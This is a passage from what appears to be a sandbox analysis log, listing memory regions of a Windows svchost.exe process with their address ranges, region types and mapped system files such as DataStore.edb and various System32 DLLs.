"c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3046 start_va = 0x6290000 end_va = 0x629ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3047 start_va = 0x62a0000 end_va = 0x62affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3048 start_va = 0x62b0000 end_va = 0x62bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3049 start_va = 0x62c0000 end_va = 0x62cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3050 start_va = 0x62d0000 end_va = 0x62dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3051 start_va = 0x62e0000 end_va = 0x62effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3052 start_va = 0x62f0000 end_va = 0x62fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3053 start_va = 0x6300000 end_va = 0x630ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3054 start_va = 0x6310000 end_va = 0x631ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3055 start_va = 0x6320000 end_va = 0x632ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3056 start_va = 0x6330000 end_va = 0x633ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3057 start_va = 0x6340000 end_va = 0x634ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3058 start_va = 0x6350000 end_va = 0x635ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3059 start_va = 0x6360000 end_va = 0x636ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3060 start_va = 0x6370000 end_va = 0x637ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3061 start_va = 0x6380000 end_va = 0x638ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3062 start_va = 0x6390000 end_va = 0x639ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3063 start_va = 0x63c0000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 3064 start_va = 0x6550000 end_va = 0x655ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3065 start_va = 0x6560000 end_va = 0x6564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3066 start_va = 0x6570000 end_va = 0x657ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3067 start_va = 0x6580000 end_va = 0x658ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3068 start_va = 0x6590000 end_va = 0x6596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 3069 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 3070 start_va = 0x66a0000 end_va = 0x66b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 3071 start_va = 0x66c0000 end_va = 0x66d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 3072 start_va = 0x66e0000 end_va = 0x66f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 3073 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 3074 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 3075 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 3076 start_va = 0x6a00000 end_va = 0x6a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3077 start_va = 0x6a10000 end_va = 0x6a1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3078 start_va = 0x6a20000 end_va = 0x6a2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3079 start_va = 0x6a30000 end_va = 0x6a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3080 start_va = 0x6a40000 end_va = 0x6a4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3081 start_va = 0x6a70000 end_va = 0x6a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3082 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 3083 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 3084 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 3085 start_va = 0x6e00000 end_va = 0x6e0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3086 start_va = 0x6e10000 end_va = 0x6e1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3087 start_va = 0x6e20000 end_va = 0x6e2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3088 start_va = 0x6e30000 end_va = 0x6e3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3089 start_va = 0x6e40000 end_va = 0x6e4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3090 start_va = 0x6e50000 end_va = 0x6e5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3091 start_va = 0x6e60000 end_va = 0x6e6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3092 start_va = 0x6e70000 end_va = 0x6e7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3093 start_va = 0x6e80000 end_va = 0x6e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3094 start_va = 0x6e90000 end_va = 0x6e9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3095 start_va = 0x6ea0000 end_va = 0x6eaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3096 start_va = 0x6eb0000 end_va = 0x6ebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3097 start_va = 0x6ec0000 end_va = 0x6ecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3098 start_va = 0x6ed0000 end_va = 0x6edffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3099 start_va = 0x6ee0000 end_va = 0x6eeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3100 start_va = 0x6ef0000 end_va = 0x6efffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3101 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 3102 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 3103 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 3104 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 3105 start_va = 0x7300000 end_va = 0x7310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 3106 start_va = 0x7320000 end_va = 0x7330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 3107 start_va = 0x7340000 end_va = 0x7350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 3108 start_va = 0x7360000 end_va = 0x7370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 3109 start_va = 0x7380000 end_va = 0x73a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 3110 start_va = 0x73b0000 end_va = 0x73e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 3111 start_va = 0x73f0000 end_va = 0x7400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 3112 start_va = 0x7410000 end_va = 0x7420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 3113 start_va = 0x7430000 end_va = 0x7460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 3114 start_va = 0x7470000 end_va = 0x74a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 3115 start_va = 0x74b0000 end_va = 0x75affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074b0000" filename = "" Region: id = 3116 start_va = 0x75b0000 end_va = 0x75bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3117 start_va = 0x75c0000 end_va = 0x75cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3118 start_va = 0x75d0000 end_va = 0x75dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3119 start_va = 0x75e0000 end_va = 0x75effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3120 start_va = 0x75f0000 end_va = 0x75fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3121 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 3122 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 3123 start_va = 0x79a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 3124 start_va = 0x7aa0000 end_va = 0x7b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007aa0000" filename = "" Region: id = 3125 start_va = 0x7ba0000 end_va = 0x7c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ba0000" filename = "" Region: id = 3126 start_va = 0x7ca0000 end_va = 0x7d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ca0000" filename = "" Region: id = 3127 start_va = 0x7da0000 end_va = 0x7e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007da0000" filename = "" Region: id = 3128 start_va = 0x81a0000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081a0000" filename = "" Region: id = 3129 start_va = 0x83a0000 end_va = 0x849ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083a0000" filename = "" Region: id = 3130 start_va = 0x84a0000 end_va = 0x859ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084a0000" filename = "" Region: id = 3131 start_va = 0x85a0000 end_va = 0x959ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085a0000" filename = "" Region: id = 3132 start_va = 0x9600000 end_va = 0x96fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009600000" filename = "" Region: id = 3133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3134 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3135 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3136 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3137 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3138 start_va = 0x7ffb0a770000 end_va = 0x7ffb0a786fff monitored = 0 entry_point = 0x7ffb0a777520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 3139 start_va = 0x7ffb0a790000 end_va = 0x7ffb0a7d3fff monitored = 0 entry_point = 0x7ffb0a7b83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 3140 start_va = 0x7ffb0a7e0000 end_va = 0x7ffb0a83cfff monitored = 0 entry_point = 0x7ffb0a80e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 3141 start_va = 0x7ffb0a840000 end_va = 0x7ffb0aaeffff monitored = 0 entry_point = 0x7ffb0a841cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 3142 start_va = 0x7ffb0ca40000 end_va = 0x7ffb0ca7efff monitored = 0 entry_point = 0x7ffb0ca682d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 3143 start_va = 0x7ffb0cad0000 end_va = 0x7ffb0cb36fff monitored = 0 entry_point = 0x7ffb0cadb160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 3144 start_va = 0x7ffb0cb40000 end_va = 0x7ffb0cb53fff monitored = 0 entry_point = 0x7ffb0cb42a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 3145 start_va = 0x7ffb0d0c0000 end_va = 0x7ffb0d1cefff monitored = 0 entry_point = 0x7ffb0d0fc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 3146 start_va = 0x7ffb0df80000 end_va = 0x7ffb0df90fff monitored = 0 entry_point = 0x7ffb0df828d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 3147 start_va = 0x7ffb0e310000 end_va = 0x7ffb0e341fff monitored = 0 entry_point = 0x7ffb0e31b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 3148 start_va = 0x7ffb0e390000 end_va = 0x7ffb0e3acfff monitored = 0 entry_point = 0x7ffb0e394f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 3149 start_va = 0x7ffb0f110000 end_va = 0x7ffb0f127fff monitored = 0 entry_point = 0x7ffb0f111b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 3150 start_va = 0x7ffb0f3e0000 end_va = 0x7ffb0f4fcfff monitored = 0 entry_point = 0x7ffb0f40fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 3151 start_va = 0x7ffb109e0000 end_va = 0x7ffb109e7fff monitored = 0 entry_point = 0x7ffb109e13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 3152 start_va = 0x7ffb109f0000 end_va = 0x7ffb10a07fff monitored = 0 entry_point = 0x7ffb109fb850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 3153 start_va = 0x7ffb10ae0000 end_va = 0x7ffb10b15fff monitored = 0 entry_point = 0x7ffb10ae27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 3154 start_va = 0x7ffb10e10000 end_va = 0x7ffb10e20fff monitored = 0 entry_point = 0x7ffb10e17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 3155 start_va = 0x7ffb10e30000 end_va = 0x7ffb10eb3fff monitored = 0 entry_point = 0x7ffb10e48d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 3156 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3157 start_va = 0x7ffb10f60000 end_va = 0x7ffb11035fff monitored = 0 entry_point = 0x7ffb10f8a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 3158 start_va = 0x7ffb11040000 end_va = 0x7ffb110a3fff monitored = 0 entry_point = 0x7ffb1105bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 3159 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3160 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3161 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3162 start_va = 0x7ffb11200000 end_va = 0x7ffb11273fff monitored = 0 entry_point = 0x7ffb11215eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 3163 start_va = 0x7ffb11280000 end_va = 0x7ffb113b6fff monitored = 0 entry_point = 0x7ffb112c0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 3164 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3165 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3166 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3167 start_va = 0x7ffb115e0000 end_va = 0x7ffb115eefff monitored = 0 entry_point = 0x7ffb115e4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 3168 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = 